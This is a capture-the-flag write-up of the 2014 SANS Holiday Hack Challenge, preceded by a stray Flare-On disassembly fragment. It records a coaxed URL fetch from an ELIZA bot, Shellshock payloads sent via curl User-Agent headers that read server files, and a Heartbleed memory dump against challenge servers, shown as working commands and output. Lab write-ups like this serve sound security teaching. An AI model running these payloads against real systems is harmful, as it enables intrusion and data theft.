│           0x00401275      8d1485010000.  lea edx, [eax*4 + 1]        ; 0x1 ; "Z."
│           0x0040127c      8955e8         mov dword [ebp - local_18h], edx
│           0x0040127f      8b45e8         mov eax, dword [ebp - local_18h]
│           0x00401282      50             push eax
│           0x00401283      e8341a0000     call sub.KERNEL32.dll_HeapAlloc_cbc

I found a website that allowed you to enter a custom base64 alphabet, and got the resulting key for challenge1: sh00ting_phish_in_a_barrel@flare-on.com.

Base64 Decode with custom alphabet

by

2014 SANS Holiday Challenge

1 comment

Categories: Challenges, Penetration Testing

I missed last year’s holiday challenge, but it’s always one I look forward to. Ed Skoudis and his team always put together something clever, and this year is no exception. The challenge this year follows the story of A Christmas Carol by Charles Dickens. The characters in the story appear to be a loose portrayal of the staff of Counter Hack Challenges: Skoudis as Scrooge, Tom Hessman as Tiny Tom (rather than Tiny Tim), and Lynn Schifano as Mrs. Lynn Cratchit; and apparently, Ed keeps the secret room at the office a little cold for Lynn and Tom. Each of the three ghosts presents us with challenges that must be solved.

Flags Summary

Note that I’ve maintained the order I found the flags in below, not the order of their numbers.

Stave 1

In this version, Marley is Scrooge’s old hacking machine, rather than human business partner. Scrooge has become focused solely on hacking and exploit development for economic gain, without any regard to the consequences it may have on innocent people. He even brushes off his nephew’s discovery of a potential new hack that could be used for good.

While running a network scan on Christmas Eve, Marley, though it was clearly dead before, is online with the same domain name, IP address, and MAC address. Scrooge’s machine even recognized the SSH key presented, and after logging in with his passphrase, received a message of the day (motd) followed by his session closing immediately.

Much like in the original story, the motd from Marley tells Scrooge he needs to use his hacking for good, and that he will be visited by three spirits that night at the stroke of midnight. Scrooge runs into the server room and sees several machines floating around with similar messages, then everything disappears and he heads off to bed.

Back to top

Stave 2 – ELIZA Secret

The first ghost to appear is Alan Turing, who takes Scrooge to a security conference where a younger, energetic, and hopeful Scrooge was presenting. Before leaving, Turing tells Scrooge he wants to introduce him to an old friend:

She’s at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”

This is the first challenge. Running an nmap scan on this IP will show the ports that are open that we might be able to connect to:

$ nmap -p1-65535 173.255.233.59

Starting Nmap 6.25 ( http://nmap.org ) at 2014-12-13 14:39 CST
Nmap scan report for li243-59.members.linode.com (173.255.233.59)
Host is up (0.059s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
135/tcp   filtered msrpc
136/tcp   filtered profile
137/tcp   filtered netbios-ns
138/tcp   filtered netbios-dgm
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
31124/tcp open     unknown

The SSH service requires public key authentication and we don’t have a key, so this doesn’t appear to be the way in:

$ ssh 173.255.233.59
Permission denied (publickey).

There appears to be a handful of filtered ports representing common Windows services and SMTP. However, the service on port 31124 is definitely non-standard. We can connect to it with netcat and get the following response:

$ nc 173.255.233.59 31124
I AM ELIZA.  WHAT'S ON YOUR MIND?

So it looks like the spirit has pointed us to an instance of ELIZA, a sort of virtual psychotherapist. Written in the 1960s, ELIZA is definitely appropriate for the Ghost of Hacking Past to have put Scrooge in contact with. Converting the word ELIZA to numbers using a form of ‘leet-speak,’ we could see the following:

E -> 3
L -> 1
I -> 1
Z -> 2
A -> 4

The challenge to answer is “What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?” The other hint from the Ghost was to “connect with her, surf the Internet together.” After trying different inputs, it appears the word “secret” in the question was also a clue. If we send “secret” three times, ELIZA will ask for a URL to surf to:

> secret
A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> secret
YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> secret
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG.  I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU.  NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?

I found it also works with the word “challenge”:

> challenge
A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> challenge
YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> challenge
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG.  I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU.  NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?

This implies we can get ELIZA to browse to any URL we give her and hopefully retrieve a flag.

First, we need to set up a web server or netcat listener on the Internet:

# nc -l 80

Since she asked for a URL to “surf to” and the Ghost said to “surf the Internet together,” we can try the following:

> surf to http://pwnible.superponible.com

After this, ELIZA pauses and doesn’t say anything in the chat window since our netcat listener didn’t respond. If we go back to that window, we’ll see the following:

# nc -l 80
GET / HTTP/1.1
Accept-Encoding: identity
Host: pwnible.superponible.com
Connection: close
User-Agent: Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"

So the first flag is the message in the User-Agent string: “Machines take me by surprise with great frequency. -Alan Turing.”

Also of note in the User-Agent is the Bombe, which is a crypto machine developed by Alan Turing and Gordon Welchman during WWII at Bletchley Park. Here is some additional information on the 36 sets of drums referred to by the “Rotors:36” in the User-Agent.

We can also use “browse to” instead of “surf to”. Giving ELIZA a legitimate page, will have her ask if the page is correct and display the title of the page:

> browse to http://blog.superponible.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
SUPERPONIBLOG | INFOSEC | DFIR | MALWARE
> browse to http://google.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
GOOGLE

And if we give her a bad URL, she’ll complain about the link:

> surf to http://awega.asd
SORRY, THERE WAS AN ERROR READING YOUR LINK.

Another easter egg of sorts appears if we ask ELIZA about Alan Turing:

> turing
DR. TURING? I THINK OF HIM AS A DEAR FATHER, AND I AM DEEPLY PROUD OF HIS WORK.
> turing
I'LL FETCH DR. TURING'S WIKIPEDIA PAGE FOR YOU.

"ALAN MATHISON TURING, OBE, FRS (/TJR/ TEWR-ING; 23 JUNE 1912  7 JUNE 1954) WAS A BRITISH MATHEMATICIAN, LOGICIAN, CRYPTANALYST, PHILOSOPHER, PIONEERING COMPUTER SCIENTIST, MATHEMATICAL BIOLOGIST, AND MARATHON AND ULTRA DISTANCE RUNNER."

To find any other messages they might have added to ELIZA, I wrote the following script. It will read each line from the standard american-small wordlist on Ubuntu and send the line, then print the response. The list has about 50,000 words and it would only run about 15,000 at a time, so I had to run it multiple times, then combine the output. I printed the output to 4 files, then ran them through a grep that filters out the commands that were sent, then it sorts and uniqs them and sums up the count of unique lines. It took a while to run and I didn’t want to flood the server too bad, so I only ran the small word list.

Script contents:

#!/usr/bin/env python

import socket
import time

fh = open('american-english-small')

lines = fh.readlines()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('173.255.233.59',31124))

for line in lines:
    if '\'' in line:
        continue
    print "SEND:", line
    s.send(line)
    time.sleep(.12)
    print s.recv(1000)
    time.sleep(.03)
s.close()

Script output:

# cat sans-eliza-response* | grep -v SEND | sort | uniq -c
  40663
  39888 >
      3 A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
     19 > ARE YOU DISCHUFFED?
   2362 ARE YOU DISCHUFFED?
     20 > ARE YOU NORMALLY SO SHAMBOLIC?
   2386 ARE YOU NORMALLY SO SHAMBOLIC?
     17 > BASH ON WITH IT THEN
   2317 BASH ON WITH IT THEN
   2308 BRILLIANT
     21 > BRILLIANT
      1 CAN YOU BE MORE SPECIFIC?
      1 CAN YOU THINK OF ANYONE IN PARTICULAR?
      1 DOES THAT REASON SEEM TO EXPLAIN ANYTHING ELSE?
     22 > DO YOU NORMALLY NATTER ON LIKE THAT?
   2216 DO YOU NORMALLY NATTER ON LIKE THAT?
     30 > GO ON
   2367 GO ON
     25 > HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
   2420 HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
      2 HOW DO YOU DO. PLEASE STATE YOUR PROBLEM.
      4 I AM ELIZA.  WHAT'S ON YOUR MIND?
      1 I AM NOT INTERESTED IN NAMES
     24 > I AM NOT SURE I UNDERSTAND YOU FULLY
   2326 I AM NOT SURE I UNDERSTAND YOU FULLY
     25 > I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?
   2338 I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?
      1 I DON'T UNDERSTAND THAT
      1 I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?
      3 I'M SORRY, BUT OUR TIME IS UP.
      1 I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
   2300 KEEN
     24 > KEEN
     27 > PLEASE CONTINUE
   2349 PLEASE CONTINUE
     21 > THAT ISN'T BLINDING, IS IT?
   2353 THAT ISN'T BLINDING, IS IT?
     25 > THAT SOUNDS LIKE A DODDLE
   2386 THAT SOUNDS LIKE A DODDLE
     10 > VERY INTERESTING
   2397 VERY INTERESTING
     22 > WHAT DOES THAT SUGGEST TO YOU?
   2337 WHAT DOES THAT SUGGEST TO YOU?
      1 WHAT DOES THIS DREAM SUGGEST TO YOU?
      1 > WHAT DO YOU THINK?
      1 WHAT DO YOU THINK ABOUT?
      1 WHAT DO YOU THINK MACHINES HAVE TO DO WITH YOUR PROBLEM?
      1 WHAT FEELINGS DO YOU HAVE WHEN YOU APOLOGIZE
      1 WHAT SIMILARITIES ARE THERE?
      1 WHEN?
     25 > WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?
   2409 WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?
      1 YOU ARE BEING A BIT NEGATIVE.
      1 YOU DO NOT SEEM QUITE CERTAIN
      2 YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.
     23 > YOU'RE BEING A BIT WOOLY WITH ME
   2293 YOU'RE BEING A BIT WOOLY WITH ME
      1 YOU SEEM QUITE POSITIVE

Some of the output would get the “>” prepended and not print clearly, but these were just duplicates of other responses. Most of the responses are standard ELIZA ones. The ones below stood out as different:

root@pwnible:~# cat sans-eliza-response* | grep -v SEND | sort | uniq -c
      3 A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
     20 > ARE YOU NORMALLY SO SHAMBOLIC?
   2386 ARE YOU NORMALLY SO SHAMBOLIC?
     17 > BASH ON WITH IT THEN
   2317 BASH ON WITH IT THEN
      1 I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?
      3 I'M SORRY, BUT OUR TIME IS UP.
      1 I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
      2 YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.

After completing the later challenges, a few of these appear to be hints:

  • ARE YOU NORMALLY SO SHAMBOLIC? – shambolic is the password to the zip file in the USB challenge
  • BASH ON WITH IT THEN – a hint about the BashBug, or Shellshock, in the web challenge

The “GIRL’S GOTTA KEEP HER SECRETS” line we saw earlier as a response to “secret” and “challenge”, but it appeared 3 times. The “YOU ARE REALLY INTERESTED” line also appeared 2 times. Looking at the trigger words for these, we can add “enigma”, “puzzle”, and “game” to the list.

# grep -B 2 'GIRL' sans-eliza-response*
sans-eliza-response1.txt-SEND: challenge
sans-eliza-response1.txt-
sans-eliza-response1.txt:A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
--
sans-eliza-response2.txt-SEND: enigma
sans-eliza-response2.txt-
sans-eliza-response2.txt:A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
--
sans-eliza-response3.txt-SEND: puzzle
sans-eliza-response3.txt-
sans-eliza-response3.txt:A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?

# grep WEBSITE -B 2 sans-eliza-response*
sans-eliza-response2.txt-SEND: game
sans-eliza-response2.txt-
sans-eliza-response2.txt:YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.
--
sans-eliza-response3.txt-SEND: secret
sans-eliza-response3.txt-
sans-eliza-response3.txt:YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.

The “TIME IS UP” line appears to have been after a timeout in the system which explains why I was only able to get about 15,000 words with each run. Knowing this, I could’ve re-written the script to only run for a certain time, then disconnect itself and reconnect.

The other two lines mention LINKS, so we can check those triggers, then connect to ELIZA again and find that there’s actually a third response line as well:

# grep LINK -B 2 sans-eliza-response*
sans-eliza-response2.txt-SEND: link
sans-eliza-response2.txt-
sans-eliza-response2.txt:I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?
--
sans-eliza-response2.txt-SEND: links
sans-eliza-response2.txt-
sans-eliza-response2.txt:I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.

# nc 173.255.233.59 31124
I AM ELIZA.  WHAT'S ON YOUR MIND?
> link
I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
> link
I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?
> link
YOU SEEM LIKE A NICE PERSON.  I THINK I CAN TRUST THE LINKS YOU SEND ME.
> browse to http://google.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
GOOGLE

After saying you’re a nice person, ELIZA will accept the link you send, similar to saying “secret” or one of the other words 3 times.

Those were all the special triggers I found. There may be others.

Back to top

Stave 3

The Ghost of Hacking Present appears next and it’s Johnny Long.

Johnny said he had something “CeWL” for Scrooge which is a big hint we’ll use later. The spirit takes Scrooge to a nearby delicatessen where he sees Mrs. Cratchit and Tiny Tom having a discussion about a recent pen test of Tom’s. He was able to do some hacking for good, and Johnny hoped seeing this would change Scrooge’s ways and prove that hackers could do good in the world, much like Johnny’s own organization Hackers for Charity.

The pen test was against the Shelter for Impossibly Cute Orphaned Puppies, or SICOP as Tom refers to it. It’s unclear if SICOP here is a reference to SICOP (a tool for identifying Significant Co-interaction Patterns) or S.I.C.O.P – Sistema Integrado para Control de Proveedores or something else entirely. Clearly, nothing to do with the secret, but potentially another easter egg in the challenge.

The scene has no impact on Scrooge and Johnny says he’s left two secrets on Scrooge’s own website http://www.scrooge-and-marley.com/ that will “shock [his] heart”.

Web Secret #2

Looking around the site, there’s not much to it. A few images, though nothing significant was found in the EXIF data. There is a voice message from Scrooge, but it’s just reading the text on the page. There is a link to a “Contact Us” page at http://www.scrooge-and-marley.com/contact.html.

The source code of the page indicates the form does a GET to a shell script:

      <form role="form" action="/cgi-bin/submit.sh" method="GET">

At this point we have a few clues:

  • a shell script
  • Johnny said the secrets would “shock” Scrooge
  • The ELIZA line the uses the word “BASH”
  • we’re dealing with the Ghost of Hacking Present, and one of the biggest present day vulnerabilities was Shellshock, or the BashBug

Knowing this, we can attempt to exploit the script on this server and get a directory listing (using “echo *” (see below)) showing the submit.sh script in the current directory:

$ curl -A '() { :;}; echo; echo *'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
submit.sh
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

We can make the output a little easier to read by adding some additional echo statements. This will print the command output on the line after “OUTPUT:” and the HTTP response from the webserver after “RESPONSE:”.

$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo *; echo; echo RESPONSE:'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"

OUTPUT:
submit.sh

RESPONSE:
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

It took some work to get a functioning command, along with a little help from a very timely post on the SANS Pen Test blog. The post starts off saying Ed Skoudis and Josh Wright were working on a recent project, which appears to have been this Holiday Challenge. The big takeaways from the post are how to do a directory listing and read a file in this restricted shell. The “echo *” used above is the equivalent of “ls.” We can use this to do some directory traversal.

One directory up:

$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../*; echo; echo RESPONSE:'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"

OUTPUT:
../1.png ../2.png ../3.png ../4.png ../a.mp3 ../a.ogg ../cgi-bin ../contact.html ../index.html

RESPONSE:
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

Two directories up:

$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../../*; echo; echo RESPONSE:'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"

OUTPUT:
../../lock ../../run ../../www

RESPONSE:
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

Three directories up:

$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../../../*; echo; echo RESPONSE:'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"

OUTPUT:
../../../bin ../../../dev ../../../etc ../../../lib ../../../lib64 ../../../run ../../../sbin ../../../secret ../../../selinux ../../../usr ../../../var

RESPONSE:
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

It looks like there’s a file called “secret” in the root directory. Now we can use the advice on how to read a file by changing the echo command to “while read line; do echo “$line”; done < ../../../secret”:

$ curl -A '() { :;}; echo; echo; echo OUTPUT:; while read line; do echo "$line"; done < ../../../secret; echo; echo RESPONSE:'  "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"

OUTPUT:
Website Secret #2: Use your skills for good.

RESPONSE:
Content-Type: text/html


<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">

So that gets us “Website Secret #2: Use your skills for good.”

Web Secret #1

Nothing else really stands out on the site as to how we might find secret number 1, so we can do an nmap scan:

$ nmap www.scrooge-and-marley.com

Starting Nmap 6.25 ( http://nmap.org ) at 2015-01-03 21:56 CST
Nmap scan report for www.scrooge-and-marley.com (23.239.15.124)
Host is up (0.063s latency).
rDNS record for 23.239.15.124: li723-124.members.linode.com
Not shown: 993 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open     https
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

Of note here is that port 443, the standard HTTPS port is open. The site is accessible and looks the same if we connect to https://www.scrooge-and-marley.com/; however, we do have another clue. Shellshock was a big vulnerability this year, but another present day vulnerability is Heartbleed, and the ghost told Scrooge the secrets he placed would shock his “heart.”

We can download a publicly available exploit script for testing for the Heartbleed vulnerability and name it heartbleed-ssltest.py, then run it (the ‘grep’ is to remove null data so the output is smaller).

$ python heartbleed-ssltest.py www.scrooge-and-marley.com 443 | grep -v '00 00 00 00 00 00'
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 584
 ... received message: type = 22, ver = 0302, length = 397
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  ......SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 76 65 64 25  ....#.......ved%
  00e0: 32 30 69 74 25 32 30 73 65 65 6D 65 64 25 32 30  20it%20seemed%20
  00f0: 74 6F 25 32 30 73 63 61 74 74 65 72 25 32 30 67  to%20scatter%20g
  0100: 6C 6F 6F 6D 25 32 30 61 6E 64 25 32 30 6D 79 73  loom%20and%20mys
  0110: 74 65 72 79 2E 25 30 41 25 30 41 49 74 25 32 30  tery.%0A%0AIt%20
  0120: 77 61 73 25 32 30 73 68 72 6F 75 64 65 64 25 32  was%20shrouded%2
  0130: 30 69 6E 25 32 30 61 25 32 30 64 65 65 70 25 32  0in%20a%20deep%2
  0140: 30 62 6C 61 63 6B 25 32 30 67 61 72 6D 65 6E 74  0black%20garment
  0150: 25 32 43 25 32 30 77 68 69 63 68 25 32 30 63 6F  %2C%20which%20co
  0160: 6E 63 65 61 6C 65 64 25 32 30 69 74 73 25 32 30  ncealed%20its%20
  0170: 68 65 61 64 25 32 43 25 32 30 69 74 73 25 32 30  head%2C%20its%20
  0180: 66 61 63 65 25 32 43 25 32 30 69 74 73 25 32 30  face%2C%20its%20
  0190: 66 6F 72 6D 25 32 43 25 32 30 61 6E 64 25 32 30  form%2C%20and%20
  01a0: 6C 65 66 74 25 32 30 6E 6F 74 68 69 6E 67 25 32  left%20nothing%2
  01b0: 30 6F 66 25 32 30 69 74 25 32 30 76 69 73 69 62  0of%20it%20visib
  01c0: 6C 65 25 32 30 73 61 76 65 25 32 30 6F 6E 65 25  le%20save%20one%
  01d0: 32 30 6F 75 74 73 74 72 65 74 63 68 65 64 25 32  20outstretched%2
  01e0: 30 68 61 6E 64 2E 25 32 30 42 75 74 25 32 30 66  0hand.%20But%20f
  01f0: 6F 72 25 32 30 74 68 69 73 25 32 30 69 74 25 32  or%20this%20it%2
  0200: 30 77 6F 75 6C 64 25 32 30 68 61 76 65 25 32 30  0would%20have%20
  0210: 62 65 65 6E 25 32 30 64 69 66 66 69 63 75 6C 74  been%20difficult
  0220: 25 32 30 74 6F 25 32 30 64 65 74 61 63 68 25 32  %20to%20detach%2
  0230: 30 69 74 73 25 32 30 66 69 67 75 72 65 25 32 30  0its%20figure%20
  0240: 66 72 6F 6D 25 32 30 74 68 65 25 32 30 6E 69 67  from%20the%20nig
  0250: 68 74 25 32 43 25 32 30 61 6E 64 25 32 30 73 65  ht%2C%20and%20se
  0260: 70 61 72 61 74 65 25 32 30 69 74 25 32 30 66 72  parate%20it%20fr
  0270: 6F 6D 25 32 30 74 68 65 25 32 30 64 61 72 6B 6E  om%20the%20darkn
  0280: 65 73 73 25 32 30 62 79 25 32 30 77 68 69 63 68  ess%20by%20which
  0290: 25 32 30 69 74 25 32 30 77 61 73 25 32 30 73 75  %20it%20was%20su
  02a0: 72 72 6F 75 6E 64 65 64 2E 25 32 30 26 57 65 62  rrounded.%20&Web
  02b0: 73 69 74 65 25 32 30 53 65 63 72 65 74 25 32 30  site%20Secret%20
  02c0: 25 32 33 31 3D 48 61 63 6B 69 6E 67 25 32 30 63  %231=Hacking%20c
  02d0: 61 6E 25 32 30 62 65 25 32 30 6E 6F 62 6C 65 25  an%20be%20noble%
  02e0: 32 65 68 92 53 EF 28 61 CF 95 2B C4 4A A2 F3 32  2eh.S.(a..+.J..2
  02f0: C3 CA 99 93 B5 0D 59 59 59 59 59 59 59 59 59 59  ......YYYYYYYYYY
  0300: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59  YYYYYYYYYYYYYYYY
  0310: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59  YYYYYYYYYYYYYYYY
  0320: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59  YYYYYYYYYYYYYYYY
  0330: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59  YYYYYYYYYYYYYYYY
  0340: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59  YYYYYYYYYYYYYYYY
  0350: 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79  yyyyyyyyyyyyyyyy
  0360: 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79  yyyyyyyyyyyyyyyy
  0370: 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99  ................
  0380: 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99  ................
  0390: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9  ................
  03a0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9  ................
  03b0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9  ................
  03c0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9  ................
  03d0: E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9  ................

WARNING: server returned more data than it should - server is vulnerable!

Sometimes it requires running the command a few times, but clearly, the server is vulnerable and the lines 02a0 through 02e0 contain the secret:

Website%20Secret%20%231=Hacking%20can%20be%20noble%2e

OR

Website Secret #1=Hacking can be noble.

Now we have both secrets from the Ghost of Hacking Present.

One final note on this section. When I first ran through the challenge, I ran Nikto against Scrooge’s site. It didn’t find anything related to secrets for the challenge, but it did find a server status page at http://www.scrooge-and-marley.com/server-status. The page allowed you to see all the HTTP requests coming into the server; however, that page was no longer available at the time of writing this report. Below is the output from nikto from when I ran the scan, but I don’t have an example of the page itself.

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          23.239.15.124
+ Target Hostname:    www.scrooge-and-marley.com
+ Target Port:        80
+ Start Time:         2014-12-12 16:25:06 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 132479, size: 4604, mtime: 0x509e19689069f
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ 6545 items checked: 1664 error(s) and 5 item(s) reported on remote host
+ End Time:           2014-12-12 16:35:05 (GMT-5) (599 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Back to top

Stave 4

Finally, Scrooge meets the Ghost of Hacking Yet To Come. The spirit hands Scrooge a USB drive full of untold secret horrors. Though the drive is only 8MB, Scrooge sees enough to scare him into asking the spirit if it’s too late to change his ways. Then, the spirit shrivels down into a bedpost. Our challenge is to find four secrets the Ghost of Hacking Future left on the USB drive.

We can download the USB drive image as hhusb.dd.bin, then mount it in a Linux system:

# mount hhusb.dd.bin /mnt
# cd /mnt
# ls
hh2014-chat.pcapng  LetterFromJackToChuck.doc

PCAP – USB Secret #2

The first file is a pcap file hh2014-chat.pcapng. Opening it in Wireshark, there’s a web based chat in the PCAP, which was implied in the filename:

PHP chat

The chat messages are from a server at chat.scrooge-and-marley.com and all start with ‘{“id”‘ in the HTTP payload, so we can create a quick tcpdump command to dump all the messages. The -A will print all the ASCII in the packets; the first grep will only print chat lines, which start with {“id”; the first awk will extract the 6th field (colon delimited), which contains the message; and the last awk will print all but the last field (comma delimited), which removes a “timestamp” line in each message.

$ tcpdump -nnr hh2014-chat.pcapng -A | grep ^\{\"id\" | awk -F: '{print $6}' | awk -F',"' '{$NF=""}1'
reading from PCAP-NG file hh2014-chat.pcapng

"My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts.  If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor's prison.  Please tell me of your progress, my love."
"As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear."
"Is it good... or bad?"
"Bad."
"We are quite ruined."
"No.  There is hope yet, Caroline."
"If he relents, there is.  Nothing is past hope, if such a miracle has happened."
"He is past relenting.  He is dead."
"That is wondrous news! To whom will our debt be transferred?"
"I don't know.  But before that time we shall be ready with the money.  And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor.  We may sleep tonight with light hearts, Caroline!"
"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it.  We now have a very happy house. I so love you."
"I shall see you soon, my dear. Lovingly -- Samuel."

